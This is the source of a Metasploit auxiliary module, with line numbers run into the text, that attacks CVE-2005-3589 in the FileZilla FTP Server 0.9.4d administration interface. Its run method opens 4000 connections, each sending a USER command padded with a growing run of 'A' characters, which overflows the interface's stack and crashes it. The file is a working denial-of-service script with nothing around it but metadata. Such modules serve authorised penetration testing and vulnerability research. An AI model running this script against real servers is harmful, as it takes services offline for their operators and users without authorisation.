Path: blob/master/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
21553 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',14'Description' => %q{15This module triggers a Denial of Service condition in the FileZilla FTP16Server Administration Interface in versions 0.9.4d and earlier.17By sending a procession of excessively long USER commands to the FTP18Server, the Administration Interface (FileZilla Server Interface.exe)19when running, will overwrite the stack with our string and generate an20exception. The FileZilla FTP Server itself will continue functioning.21},22'Author' => [ 'aushack' ],23'License' => MSF_LICENSE,24'References' => [25[ 'BID', '15346' ],26[ 'CVE', '2005-3589' ],27[ 'EDB', '1336' ],28[ 'OSVDB', '20817' ]29],30'DisclosureDate' => '2005-11-07',31'Notes' => {32'Stability' => [CRASH_SERVICE_DOWN],33'SideEffects' => [],34'Reliability' => []35}36)37)38end3940def run41print_status('Sending 4000 packets, this may take a while.')42434000.times do |x|44connect45sock.put("USER #{'A' * x}\r\n")46disconnect47end48end49end505152